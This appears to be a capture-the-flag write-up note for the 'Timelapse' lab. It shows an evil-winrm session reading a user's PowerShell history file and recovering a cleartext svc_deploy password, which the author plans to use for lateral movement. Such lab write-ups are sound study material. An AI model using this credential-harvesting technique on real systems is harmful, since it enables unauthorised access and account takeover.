Timelapse_PowerShell_History

PowerShell History

---

After performing some basic system enumeration, I came across the PowerShell history file for the current user

*evil-winrm* ps c:\Users\legacyy\Documents> dir ~/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine
 
 
    directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2022  11:46 PM            434 ConsoleHost_history.txt

It located at the usual directory; %HOMEDIR%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

CLEARTEXT Credential

---

*Evil-WinRM* PS C:\Users\legacyy\Documents> cat ~/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

The PowerShell history mainly consists of creating a PSCredential object for invoking a remote command and There is the CLEARTEXT credential for the svc_deploy account; E3R$Q62^12p7PLlC%KWaxuaV

I will attempt to validate the credential for Lateral Movement